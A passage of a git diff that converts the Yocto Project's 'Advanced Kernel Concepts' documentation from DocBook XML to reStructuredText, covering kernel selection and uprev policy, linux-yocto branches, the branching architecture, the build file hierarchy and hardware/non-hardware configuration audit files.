+of development by the Linux community. In other words, the Linux kernel
+is in the release candidate or "rc" phase and has yet to reach final
+release. But, by being in the final stages of external development, the
+team knows that the ``kernel.org`` final release will clearly be within
+the early stages of the Yocto Project development window.
+
+This balance allows the Yocto Project team to deliver the most
+up-to-date Yocto Linux kernel possible, while still ensuring that the
+team has a stable official release for the baseline Linux kernel
+version.
+
+As implied earlier, the ultimate source for Yocto Linux kernels are
+released kernels from ``kernel.org``. In addition to a foundational
+kernel from ``kernel.org``, the available Yocto Linux kernels contain a
+mix of important new mainline developments, non-mainline developments
+(when no alternative exists), Board Support Package (BSP) developments,
+and custom features. These additions result in a commercially released
+Yocto Project Linux kernel that caters to specific embedded designer
+needs for targeted hardware.
+
+You can find a web interface to the Yocto Linux kernels in the
+:ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+at :yocto_git:`/`. If you look at the interface, you will see to
+the left a grouping of Git repositories titled "Yocto Linux Kernel".
+Within this group, you will find several Linux Yocto kernels developed
+and included with Yocto Project releases:
+
+-  *linux-yocto-4.1:* The stable Yocto Project kernel to use with
+   the Yocto Project Release 2.0. This kernel is based on the Linux 4.1
+   released kernel.
+
+-  *linux-yocto-4.4:* The stable Yocto Project kernel to use with
+   the Yocto Project Release 2.1. This kernel is based on the Linux 4.4
+   released kernel.
+
+-  *linux-yocto-4.6:* A temporary kernel that is not tied to any
+   Yocto Project release.
+
+-  *linux-yocto-4.8:* The stable yocto Project kernel to use with
+   the Yocto Project Release 2.2.
+
+-  *linux-yocto-4.9:* The stable Yocto Project kernel to use with
+   the Yocto Project Release 2.3. This kernel is based on the Linux 4.9
+   released kernel.
+
+-  *linux-yocto-4.10:* The default stable Yocto Project kernel to
+   use with the Yocto Project Release 2.3. This kernel is based on the
+   Linux 4.10 released kernel.
+
+-  *linux-yocto-4.12:* The default stable Yocto Project kernel to
+   use with the Yocto Project Release 2.4. This kernel is based on the
+   Linux 4.12 released kernel.
+
+-  *yocto-kernel-cache:* The ``linux-yocto-cache`` contains patches
+   and configurations for the linux-yocto kernel tree. This repository
+   is useful when working on the linux-yocto kernel. For more
+   information on this "Advanced Kernel Metadata", see the
+   ":doc:`kernel-dev-advanced`" Chapter.
+
+-  *linux-yocto-dev:* A development kernel based on the latest
+   upstream release candidate available.
+
+.. note::
+
+   Long Term Support Initiative (LTSI) for Yocto Linux kernels is as
+   follows:
+
+   -  For Yocto Project releases 1.7, 1.8, and 2.0, the LTSI kernel is
+      ``linux-yocto-3.14``.
+
+   -  For Yocto Project releases 2.1, 2.2, and 2.3, the LTSI kernel is
+      ``linux-yocto-4.1``.
+
+   -  For Yocto Project release 2.4, the LTSI kernel is
+      ``linux-yocto-4.9``
+
+   -  ``linux-yocto-4.4`` is an LTS kernel.
+
+Once a Yocto Linux kernel is officially released, the Yocto Project team
+goes into their next development cycle, or upward revision (uprev)
+cycle, while still continuing maintenance on the released kernel. It is
+important to note that the most sustainable and stable way to include
+feature development upstream is through a kernel uprev process.
+Back-porting hundreds of individual fixes and minor features from
+various kernel versions is not sustainable and can easily compromise
+quality.
+
+During the uprev cycle, the Yocto Project team uses an ongoing analysis
+of Linux kernel development, BSP support, and release timing to select
+the best possible ``kernel.org`` Linux kernel version on which to base
+subsequent Yocto Linux kernel development. The team continually monitors
+Linux community kernel development to look for significant features of
+interest. The team does consider back-porting large features if they
+have a significant advantage. User or community demand can also trigger
+a back-port or creation of new functionality in the Yocto Project
+baseline kernel during the uprev cycle.
+
+Generally speaking, every new Linux kernel both adds features and
+introduces new bugs. These consequences are the basic properties of
+upstream Linux kernel development and are managed by the Yocto Project
+team's Yocto Linux kernel development strategy. It is the Yocto Project
+team's policy to not back-port minor features to the released Yocto
+Linux kernel. They only consider back-porting significant technological
+jumps - and, that is done after a complete gap analysis. The reason
+for this policy is that back-porting any small to medium sized change
+from an evolving Linux kernel can easily create mismatches,
+incompatibilities and very subtle errors.
+
+The policies described in this section result in both a stable and a
+cutting edge Yocto Linux kernel that mixes forward ports of existing
+Linux kernel features and significant and critical new functionality.
+Forward porting Linux kernel functionality into the Yocto Linux kernels
+available through the Yocto Project can be thought of as a "micro
+uprev". The many "micro uprevs" produce a Yocto Linux kernel version
+with a mix of important new mainline, non-mainline, BSP developments and
+feature integrations. This Yocto Linux kernel gives insight into new
+features and allows focused amounts of testing to be done on the kernel,
+which prevents surprises when selecting the next major uprev. The
+quality of these cutting edge Yocto Linux kernels is evolving and the
+kernels are used in leading edge feature and BSP development.
+
+Yocto Linux Kernel Architecture and Branching Strategies
+========================================================
+
+As mentioned earlier, a key goal of the Yocto Project is to present the
+developer with a kernel that has a clear and continuous history that is
+visible to the user. The architecture and mechanisms, in particular the
+branching strategies, used achieve that goal in a manner similar to
+upstream Linux kernel development in ``kernel.org``.
+
+You can think of a Yocto Linux kernel as consisting of a baseline Linux
+kernel with added features logically structured on top of the baseline.
+The features are tagged and organized by way of a branching strategy
+implemented by the Yocto Project team using the Source Code Manager
+(SCM) Git.
+
+.. note::
+
+   -  Git is the obvious SCM for meeting the Yocto Linux kernel
+      organizational and structural goals described in this section. Not
+      only is Git the SCM for Linux kernel development in ``kernel.org``
+      but, Git continues to grow in popularity and supports many
+      different work flows, front-ends and management techniques.
+
+   -  You can find documentation on Git at https://git-scm.com/doc. You can
+      also get an introduction to Git as it applies to the Yocto Project in the
+      ":ref:`overview-manual/overview-manual-development-environment:git`" section in the Yocto Project
+      Overview and Concepts Manual. The latter reference provides an
+      overview of Git and presents a minimal set of Git commands that
+      allows you to be functional using Git. You can use as much, or as
+      little, of what Git has to offer to accomplish what you need for
+      your project. You do not have to be a "Git Expert" in order to use
+      it with the Yocto Project.
+
+Using Git's tagging and branching features, the Yocto Project team
+creates kernel branches at points where functionality is no longer
+shared and thus, needs to be isolated. For example, board-specific
+incompatibilities would require different functionality and would
+require a branch to separate the features. Likewise, for specific kernel
+features, the same branching strategy is used.
+
+This "tree-like" architecture results in a structure that has features
+organized to be specific for particular functionality, single kernel
+types, or a subset of kernel types. Thus, the user has the ability to
+see the added features and the commits that make up those features. In
+addition to being able to see added features, the user can also view the
+history of what made up the baseline Linux kernel.
+
+Another consequence of this strategy results in not having to store the
+same feature twice internally in the tree. Rather, the kernel team
+stores the unique differences required to apply the feature onto the
+kernel type in question.
+
+.. note::
+
+   The Yocto Project team strives to place features in the tree such
+   that features can be shared by all boards and kernel types where
+   possible. However, during development cycles or when large features
+   are merged, the team cannot always follow this practice. In those
+   cases, the team uses isolated branches to merge features.
+
+BSP-specific code additions are handled in a similar manner to
+kernel-specific additions. Some BSPs only make sense given certain
+kernel types. So, for these types, the team creates branches off the end
+of that kernel type for all of the BSPs that are supported on that
+kernel type. From the perspective of the tools that create the BSP
+branch, the BSP is really no different than a feature. Consequently, the
+same branching strategy applies to BSPs as it does to kernel features.
+So again, rather than store the BSP twice, the team only stores the
+unique differences for the BSP across the supported multiple kernels.
+
+While this strategy can result in a tree with a significant number of
+branches, it is important to realize that from the developer's point of
+view, there is a linear path that travels from the baseline
+``kernel.org``, through a select group of features and ends with their
+BSP-specific commits. In other words, the divisions of the kernel are
+transparent and are not relevant to the developer on a day-to-day basis.
+From the developer's perspective, this path is the "master" branch in
+Git terms. The developer does not need to be aware of the existence of
+any other branches at all. Of course, value exists in the having these
+branches in the tree, should a person decide to explore them. For
+example, a comparison between two BSPs at either the commit level or at
+the line-by-line code ``diff`` level is now a trivial operation.
+
+The following illustration shows the conceptual Yocto Linux kernel.
+
+.. image:: figures/kernel-architecture-overview.png
+   :align: center
+
+In the illustration, the "Kernel.org Branch Point" marks the specific
+spot (or Linux kernel release) from which the Yocto Linux kernel is
+created. From this point forward in the tree, features and differences
+are organized and tagged.
+
+The "Yocto Project Baseline Kernel" contains functionality that is
+common to every kernel type and BSP that is organized further along in
+the tree. Placing these common features in the tree this way means
+features do not have to be duplicated along individual branches of the
+tree structure.
+
+From the "Yocto Project Baseline Kernel", branch points represent
+specific functionality for individual Board Support Packages (BSPs) as
+well as real-time kernels. The illustration represents this through
+three BSP-specific branches and a real-time kernel branch. Each branch
+represents some unique functionality for the BSP or for a real-time
+Yocto Linux kernel.
+
+In this example structure, the "Real-time (rt) Kernel" branch has common
+features for all real-time Yocto Linux kernels and contains more
+branches for individual BSP-specific real-time kernels. The illustration
+shows three branches as an example. Each branch points the way to
+specific, unique features for a respective real-time kernel as they
+apply to a given BSP.
+
+The resulting tree structure presents a clear path of markers (or
+branches) to the developer that, for all practical purposes, is the
+Yocto Linux kernel needed for any given set of requirements.
+
+.. note::
+
+   Keep in mind the figure does not take into account all the supported
+   Yocto Linux kernels, but rather shows a single generic kernel just
+   for conceptual purposes. Also keep in mind that this structure
+   represents the
+   :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+   that are either pulled from during the build or established on the
+   host development system prior to the build by either cloning a
+   particular kernel's Git repository or by downloading and unpacking a
+   tarball.
+
+Working with the kernel as a structured tree follows recognized
+community best practices. In particular, the kernel as shipped with the
+product, should be considered an "upstream source" and viewed as a
+series of historical and documented modifications (commits). These
+modifications represent the development and stabilization done by the
+Yocto Project kernel development team.
+
+Because commits only change at significant release points in the product
+life cycle, developers can work on a branch created from the last
+relevant commit in the shipped Yocto Project Linux kernel. As mentioned
+previously, the structure is transparent to the developer because the
+kernel tree is left in this state after cloning and building the kernel.
+
+Kernel Build File Hierarchy
+===========================
+
+Upstream storage of all the available kernel source code is one thing,
+while representing and using the code on your host development system is
+another. Conceptually, you can think of the kernel source repositories
+as all the source files necessary for all the supported Yocto Linux
+kernels. As a developer, you are just interested in the source files for
+the kernel on which you are working. And, furthermore, you need them
+available on your host system.
+
+Kernel source code is available on your host system several different
+ways:
+
+-  *Files Accessed While using devtool:* ``devtool``, which is
+   available with the Yocto Project, is the preferred method by which to
+   modify the kernel. See the ":ref:`kernel-dev/kernel-dev-intro:kernel modification workflow`" section.
+
+-  *Cloned Repository:* If you are working in the kernel all the time,
+   you probably would want to set up your own local Git repository of
+   the Yocto Linux kernel tree. For information on how to clone a Yocto
+   Linux kernel Git repository, see the
+   ":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+   section.
+
+-  *Temporary Source Files from a Build:* If you just need to make some
+   patches to the kernel using a traditional BitBake workflow (i.e. not
+   using the ``devtool``), you can access temporary kernel source files
+   that were extracted and used during a kernel build.
+
+The temporary kernel source files resulting from a build using BitBake
+have a particular hierarchy. When you build the kernel on your
+development system, all files needed for the build are taken from the
+source repositories pointed to by the
+:term:`SRC_URI` variable and gathered
+in a temporary work area where they are subsequently used to create the
+unique kernel. Thus, in a sense, the process constructs a local source
+tree specific to your kernel from which to generate the new kernel
+image.
+
+The following figure shows the temporary file structure created on your
+host system when you build the kernel using Bitbake. This
+:term:`Build Directory` contains all the
+source files used during the build.
+
+.. image:: figures/kernel-overview-2-generic.png
+   :align: center
+
+Again, for additional information on the Yocto Project kernel's
+architecture and its branching strategy, see the
+":ref:`kernel-dev/kernel-dev-concepts-appx:yocto linux kernel architecture and branching strategies`"
+section. You can also reference the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+and
+":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+sections for detailed example that modifies the kernel.
+
+Determining Hardware and Non-Hardware Features for the Kernel Configuration Audit Phase
+=======================================================================================
+
+This section describes part of the kernel configuration audit phase that
+most developers can ignore. For general information on kernel
+configuration including ``menuconfig``, ``defconfig`` files, and
+configuration fragments, see the
+":ref:`kernel-dev/kernel-dev-common:configuring the kernel`" section.
+
+During this part of the audit phase, the contents of the final
+``.config`` file are compared against the fragments specified by the
+system. These fragments can be system fragments, distro fragments, or
+user-specified configuration elements. Regardless of their origin, the
+OpenEmbedded build system warns the user if a specific option is not
+included in the final kernel configuration.
+
+By default, in order to not overwhelm the user with configuration
+warnings, the system only reports missing "hardware" options as they
+could result in a boot failure or indicate that important hardware is
+not available.
+
+To determine whether or not a given option is "hardware" or
+"non-hardware", the kernel Metadata in ``yocto-kernel-cache`` contains
+files that classify individual or groups of options as either hardware
+or non-hardware. To better show this, consider a situation where the
+``yocto-kernel-cache`` contains the following files:
+::
+
+   yocto-kernel-cache/features/drm-psb/hardware.cfg
+   yocto-kernel-cache/features/kgdb/hardware.cfg
+   yocto-kernel-cache/ktypes/base/hardware.cfg
+   yocto-kernel-cache/bsp/mti-malta32/hardware.cfg
+   yocto-kernel-cache/bsp/qemu-ppc32/hardware.cfg
+   yocto-kernel-cache/bsp/qemuarma9/hardware.cfg
+   yocto-kernel-cache/bsp/mti-malta64/hardware.cfg
+   yocto-kernel-cache/bsp/arm-versatile-926ejs/hardware.cfg
+   yocto-kernel-cache/bsp/common-pc/hardware.cfg
+   yocto-kernel-cache/bsp/common-pc-64/hardware.cfg
+   yocto-kernel-cache/features/rfkill/non-hardware.cfg
+   yocto-kernel-cache/ktypes/base/non-hardware.cfg
+   yocto-kernel-cache/features/aufs/non-hardware.kcf
+   yocto-kernel-cache/features/ocf/non-hardware.kcf
+   yocto-kernel-cache/ktypes/base/non-hardware.kcf
+   yocto-kernel-cache/ktypes/base/hardware.kcf
+   yocto-kernel-cache/bsp/qemu-ppc32/hardware.kcf
+
+The following list
+provides explanations for the various files:
+
+-  ``hardware.kcf``: Specifies a list of kernel Kconfig files that
+   contain hardware options only.
+
+-  ``non-hardware.kcf``: Specifies a list of kernel Kconfig files that
+   contain non-hardware options only.
+
+-  ``hardware.cfg``: Specifies a list of kernel ``CONFIG_`` options that
+   are hardware, regardless of whether or not they are within a Kconfig
+   file specified by a hardware or non-hardware Kconfig file (i.e.
+   ``hardware.kcf`` or ``non-hardware.kcf``).
+
+-  ``non-hardware.cfg``: Specifies a list of kernel ``CONFIG_`` options
+   that are not hardware, regardless of whether or not they are within a
+   Kconfig file specified by a hardware or non-hardware Kconfig file
+   (i.e. ``hardware.kcf`` or ``non-hardware.kcf``).
+
+Here is a specific example using the
+``kernel-cache/bsp/mti-malta32/hardware.cfg``:
+::
+
+   CONFIG_SERIAL_8250
+   CONFIG_SERIAL_8250_CONSOLE
+   CONFIG_SERIAL_8250_NR_UARTS
+   CONFIG_SERIAL_8250_PCI
+   CONFIG_SERIAL_CORE
+   CONFIG_SERIAL_CORE_CONSOLE
+   CONFIG_VGA_ARB
+
+The kernel configuration audit automatically detects
+these files (hence the names must be exactly the ones discussed here),
+and uses them as inputs when generating warnings about the final
+``.config`` file.
+
+A user-specified kernel Metadata repository, or recipe space feature,
+can use these same files to classify options that are found within its
+``.cfg`` files as hardware or non-hardware, to prevent the OpenEmbedded
+build system from producing an error or warning when an option is not in
+the final ``.config`` file.
diff --git a/documentation/kernel-dev/kernel-dev-concepts-appx.xml b/documentation/kernel-dev/kernel-dev-concepts-appx.xml
deleted file mode 100644
index 62c68527d2..0000000000
--- a/documentation/kernel-dev/kernel-dev-concepts-appx.xml
+++ /dev/null
@@ -1,621 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='kernel-dev-concepts-appx'>
-<title>Advanced Kernel Concepts</title>
-
-    <section id='kernel-big-picture'>
-        <title>Yocto Project Kernel Development and Maintenance</title>
-
-        <para>
-            Kernels available through the Yocto Project (Yocto Linux kernels),
-            like other kernels, are based off the Linux kernel releases from
-            <ulink url='http://www.kernel.org'></ulink>.
-            At the beginning of a major Linux kernel development cycle, the
-            Yocto Project team chooses a Linux kernel based on factors such as
-            release timing, the anticipated release timing of final upstream
-            <filename>kernel.org</filename> versions, and Yocto Project
-            feature requirements.
-            Typically, the Linux kernel chosen is in the final stages of
-            development by the Linux community.
-            In other words, the Linux kernel is in the release candidate
-            or "rc" phase and has yet to reach final release.
-            But, by being in the final stages of external development, the
-            team knows that the <filename>kernel.org</filename> final release
-            will clearly be within the early stages of the Yocto Project
-            development window.
-        </para>
-
-        <para>
-            This balance allows the Yocto Project team to deliver the most
-            up-to-date Yocto Linux kernel possible, while still ensuring that
-            the team has a stable official release for the baseline Linux
-            kernel version.
-        </para>
-
-        <para>
-            As implied earlier, the ultimate source for Yocto Linux kernels
-            are released kernels from <filename>kernel.org</filename>.
-            In addition to a foundational kernel from
-            <filename>kernel.org</filename>, the available Yocto Linux kernels
-            contain a mix of important new mainline developments, non-mainline
-            developments (when no alternative exists), Board Support Package
-            (BSP) developments, and custom features.
-            These additions result in a commercially released Yocto
-            Project Linux kernel that caters to specific embedded designer
-            needs for targeted hardware.
-        </para>
-
-        <para>
-            You can find a web interface to the Yocto Linux kernels in the
-            <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-            at
-            <ulink url='&YOCTO_GIT_URL;'></ulink>.
-            If you look at the interface, you will see to the left a
-            grouping of Git repositories titled "Yocto Linux Kernel".
-            Within this group, you will find several Linux Yocto kernels
-            developed and included with Yocto Project releases:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.1</filename>:</emphasis>
-                    The stable Yocto Project kernel to use with the Yocto
-                    Project Release 2.0.
-                    This kernel is based on the Linux 4.1 released kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.4</filename>:</emphasis>
-                    The stable Yocto Project kernel to use with the Yocto
-                    Project Release 2.1.
-                    This kernel is based on the Linux 4.4 released kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.6</filename>:</emphasis>
-                    A temporary kernel that is not tied to any Yocto Project
-                    release.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.8</filename>:</emphasis>
-                    The stable yocto Project kernel to use with the Yocto
-                    Project Release 2.2.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.9</filename>:</emphasis>
-                    The stable Yocto Project kernel to use with the Yocto
-                    Project Release 2.3.
-                    This kernel is based on the Linux 4.9 released kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.10</filename>:</emphasis>
-                    The default stable Yocto Project kernel to use with the
-                    Yocto Project Release 2.3.
-                    This kernel is based on the Linux 4.10 released kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-4.12</filename>:</emphasis>
-                    The default stable Yocto Project kernel to use with the
-                    Yocto Project Release 2.4.
-                    This kernel is based on the Linux 4.12 released kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>yocto-kernel-cache</filename>:</emphasis>
-                    The <filename>linux-yocto-cache</filename> contains
-                    patches and configurations for the linux-yocto kernel
-                    tree.
-                    This repository is useful when working on the linux-yocto
-                    kernel.
-                    For more information on this "Advanced Kernel Metadata",
-                    see the
-                    "<link linkend='kernel-dev-advanced'>Working With Advanced Metadata (<filename>yocto-kernel-cache</filename>)</link>"
-                    Chapter.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto-dev</filename>:</emphasis>
-                    A development kernel based on the latest upstream release
-                    candidate available.
-                    </para></listitem>
-            </itemizedlist>
-            <note><title>Notes</title>
-                Long Term Support Initiative (LTSI) for Yocto Linux
-                kernels is as follows:
-                <itemizedlist>
-                    <listitem><para>
-                        For Yocto Project releases 1.7, 1.8, and 2.0,
-                        the LTSI kernel is
-                        <filename>linux-yocto-3.14</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        For Yocto Project releases 2.1, 2.2, and 2.3,
-                        the LTSI kernel is <filename>linux-yocto-4.1</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        For Yocto Project release 2.4, the LTSI kernel is
-                        <filename>linux-yocto-4.9</filename>
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>linux-yocto-4.4</filename> is an LTS
-                        kernel.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            Once a Yocto Linux kernel is officially released, the Yocto
-            Project team goes into their next development cycle, or upward
-            revision (uprev) cycle, while still continuing maintenance on the
-            released kernel.
-            It is important to note that the most sustainable and stable way
-            to include feature development upstream is through a kernel uprev
-            process.
-            Back-porting hundreds of individual fixes and minor features from
-            various kernel versions is not sustainable and can easily
-            compromise quality.
-        </para>
-
-        <para>
-            During the uprev cycle, the Yocto Project team uses an ongoing
-            analysis of Linux kernel development, BSP support, and release
-            timing to select the best possible <filename>kernel.org</filename>
-            Linux kernel version on which to base subsequent Yocto Linux
-            kernel development.
-            The team continually monitors Linux community kernel development
-            to look for significant features of interest.
-            The team does consider back-porting large features if they have a
-            significant advantage.
-            User or community demand can also trigger a back-port or creation
-            of new functionality in the Yocto Project baseline kernel during
-            the uprev cycle.
-        </para>
-
-        <para>
-            Generally speaking, every new Linux kernel both adds features and
-            introduces new bugs.
-            These consequences are the basic properties of upstream
-            Linux kernel development and are managed by the Yocto Project
-            team's Yocto Linux kernel development strategy.
-            It is the Yocto Project team's policy to not back-port minor
-            features to the released Yocto Linux kernel.
-            They only consider back-porting significant technological
-            jumps &dash; and, that is done after a complete gap analysis.
-            The reason for this policy is that back-porting any small to
-            medium sized change from an evolving Linux kernel can easily
-            create mismatches, incompatibilities and very subtle errors.
-        </para>
-
-        <para>
-            The policies described in this section result in both a stable
-            and a cutting edge Yocto Linux kernel that mixes forward ports of
-            existing Linux kernel features and significant and critical new
-            functionality.
-            Forward porting Linux kernel functionality into the Yocto Linux
-            kernels available through the Yocto Project can be thought of as
-            a "micro uprev."
-            The many “micro uprevs� produce a Yocto Linux kernel version with
-            a mix of important new mainline, non-mainline, BSP developments
-            and feature integrations.
-            This Yocto Linux kernel gives insight into new features and
-            allows focused amounts of testing to be done on the kernel,
-            which prevents surprises when selecting the next major uprev.
-            The quality of these cutting edge Yocto Linux kernels is evolving
-            and the kernels are used in leading edge feature and BSP
-            development.
-        </para>
-    </section>
-
-    <section id='yocto-linux-kernel-architecture-and-branching-strategies'>
-        <title>Yocto Linux Kernel Architecture and Branching Strategies</title>
-
-        <para>
-            As mentioned earlier, a key goal of the Yocto Project is
-            to present the developer with a kernel that has a clear and
-            continuous history that is visible to the user.
-            The architecture and mechanisms, in particular the branching
-            strategies, used achieve that goal in a manner similar to
-            upstream Linux kernel development in
-            <filename>kernel.org</filename>.
-        </para>
-
-        <para>
-            You can think of a Yocto Linux kernel as consisting of a
-            baseline Linux kernel with added features logically structured
-            on top of the baseline.
-            The features are tagged and organized by way of a branching
-            strategy implemented by the Yocto Project team using the
-            Source Code Manager (SCM) Git.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        Git is the obvious SCM for meeting the Yocto Linux
-                        kernel organizational and structural goals described
-                        in this section.
-                        Not only is Git the SCM for Linux kernel development in
-                        <filename>kernel.org</filename> but, Git continues to
-                         grow in popularity and supports many different work
-                         flows, front-ends and management techniques.
-                        </para></listitem>
-                    <listitem><para>
-                        You can find documentation on Git at
-                        <ulink url='http://git-scm.com/documentation'></ulink>.
-                        You can also get an introduction to Git as it
-                        applies to the Yocto Project in the
-                        "<ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>"
-                        section in the Yocto Project Overview and Concepts
-                        Manual.
-                        The latter reference provides an overview of
-                        Git and presents a minimal set of Git commands
-                        that allows you to be functional using Git.
-                        You can use as much, or as little, of what Git
-                        has to offer to accomplish what you need for your
-                        project.
-                        You do not have to be a "Git Expert" in order to
-                        use it with the Yocto Project.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            Using Git's tagging and branching features, the Yocto Project
-            team creates kernel branches at points where functionality is
-            no longer shared and thus, needs to be isolated.
-            For example, board-specific incompatibilities would require
-            different functionality and would require a branch to
-            separate the features.
-            Likewise, for specific kernel features, the same branching
-            strategy is used.
-        </para>
-
-        <para>
-            This "tree-like" architecture results in a structure that has
-            features organized to be specific for particular functionality,
-            single kernel types, or a subset of kernel types.
-            Thus, the user has the ability to see the added features and the
-            commits that make up those features.
-            In addition to being able to see added features, the user
-            can also view the history of what made up the baseline
-            Linux kernel.
-        </para>
-
-        <para>
-            Another consequence of this strategy results in not having to
-            store the same feature twice internally in the tree.
-            Rather, the kernel team stores the unique differences required
-            to apply the feature onto the kernel type in question.
-            <note>
-                The Yocto Project team strives to place features in the tree
-                such that features can be shared by all boards and kernel
-                types where possible.
-                However, during development cycles or when large features
-                are merged, the team cannot always follow this practice.
-                In those cases, the team uses isolated branches to merge
-                features.
-            </note>
-        </para>
-
-        <para>
-            BSP-specific code additions are handled in a similar manner to
-            kernel-specific additions.
-            Some BSPs only make sense given certain kernel types.
-            So, for these types, the team creates branches off the end
-            of that kernel type for all of the BSPs that are supported on
-            that kernel type.
-            From the perspective of the tools that create the BSP branch,
-            the BSP is really no different than a feature.
-            Consequently, the same branching strategy applies to BSPs as
-            it does to kernel features.
-            So again, rather than store the BSP twice, the team only
-            stores the unique differences for the BSP across the supported
-            multiple kernels.
-        </para>
-
-        <para>
-            While this strategy can result in a tree with a significant number
-            of branches, it is important to realize that from the developer's
-            point of view, there is a linear path that travels from the
-            baseline <filename>kernel.org</filename>, through a select
-            group of features and ends with their BSP-specific commits.
-            In other words, the divisions of the kernel are transparent and
-            are not relevant to the developer on a day-to-day basis.
-            From the developer's perspective, this path is the "master" branch
-            in Git terms.
-            The developer does not need to be aware of the existence of any
-            other branches at all.
-            Of course, value exists in the having these branches in the tree,
-            should a person decide to explore them.
-            For example, a comparison between two BSPs at either the commit
-            level or at the line-by-line code <filename>diff</filename> level
-            is now a trivial operation.
-        </para>
-
-        <para>
-            The following illustration shows the conceptual Yocto
-            Linux kernel.
-            <imagedata fileref="figures/kernel-architecture-overview.png" width="6in" depth="7in" align="center" scale="100" />
-        </para>
-
-        <para>
-            In the illustration, the "Kernel.org Branch Point" marks the
-            specific spot (or Linux kernel release) from which the
-            Yocto Linux kernel is created.
-            From this point forward in the tree, features and differences
-            are organized and tagged.
-        </para>
-
-        <para>
-            The "Yocto Project Baseline Kernel" contains functionality that
-            is common to every kernel type and BSP that is organized
-            further along in the tree.
-            Placing these common features in the tree this way means
-            features do not have to be duplicated along individual
-            branches of the tree structure.
-        </para>
-
-        <para>
-            From the "Yocto Project Baseline Kernel", branch points represent
-            specific functionality for individual Board Support Packages
-            (BSPs) as well as real-time kernels.
-            The illustration represents this through three BSP-specific
-            branches and a real-time kernel branch.
-            Each branch represents some unique functionality for the BSP
-            or for a real-time Yocto Linux kernel.
-        </para>
-
-        <para>
-            In this example structure, the "Real-time (rt) Kernel" branch has
-            common features for all real-time Yocto Linux kernels and
-            contains more branches for individual BSP-specific real-time
-            kernels.
-            The illustration shows three branches as an example.
-            Each branch points the way to specific, unique features for a
-            respective real-time kernel as they apply to a given BSP.
-        </para>
-
-        <para>
-            The resulting tree structure presents a clear path of markers
-            (or branches) to the developer that, for all practical
-            purposes, is the Yocto Linux kernel needed for any given set of
-            requirements.
-            <note>
-                Keep in mind the figure does not take into account all the
-                supported Yocto Linux kernels, but rather shows a single
-                generic kernel just for conceptual purposes.
-                Also keep in mind that this structure represents the Yocto
-                Project
-                <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-                that are either pulled from during the build or established
-                on the host development system prior to the build by either
-                cloning a particular kernel's Git repository or by
-                downloading and unpacking a tarball.
-            </note>
-        </para>
-
-        <para>
-            Working with the kernel as a structured tree follows recognized
-            community best practices.
-            In particular, the kernel as shipped with the product, should be
-            considered an "upstream source" and viewed as a series of
-            historical and documented modifications (commits).
-            These modifications represent the development and stabilization
-            done by the Yocto Project kernel development team.
-        </para>
-
-        <para>
-            Because commits only change at significant release points in the
-            product life cycle, developers can work on a branch created
-            from the last relevant commit in the shipped Yocto Project Linux
-            kernel.
-            As mentioned previously, the structure is transparent to the
-            developer because the kernel tree is left in this state after
-            cloning and building the kernel.
-        </para>
-    </section>
-
-    <section id='kernel-build-file-hierarchy'>
-        <title>Kernel Build File Hierarchy</title>
-
-        <para>
-            Upstream storage of all the available kernel source code is
-            one thing, while representing and using the code on your host
-            development system is another.
-            Conceptually, you can think of the kernel source repositories
-            as all the source files necessary for all the supported
-            Yocto Linux kernels.
-            As a developer, you are just interested in the source files
-            for the kernel on which you are working.
-            And, furthermore, you need them available on your host system.
-        </para>
-
-        <para>
-            Kernel source code is available on your host system several
-            different ways:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Files Accessed While using <filename>devtool</filename>:</emphasis>
-                    <filename>devtool</filename>, which is available with the
-                    Yocto Project, is the preferred method by which to
-                    modify the kernel.
-                    See the
-                    "<link linkend='kernel-modification-workflow'>Kernel Modification Workflow</link>"
-                    section.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Cloned Repository:</emphasis>
-                    If you are working in the kernel all the time, you probably
-                    would want to set up your own local Git repository of the
-                    Yocto Linux kernel tree.
-                    For information on how to clone a Yocto Linux kernel
-                    Git repository, see the
-                    "<link linkend='preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</link>"
-                    section.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Temporary Source Files from a Build:</emphasis>
-                    If you just need to make some patches to the kernel using
-                    a traditional BitBake workflow (i.e. not using the
-                    <filename>devtool</filename>), you can access temporary
-                    kernel source files that were extracted and used during
-                    a kernel build.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            The temporary kernel source files resulting from a build using
-            BitBake have a particular hierarchy.
-            When you build the kernel on your development system, all files
-            needed for the build are taken from the source repositories
-            pointed to by the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
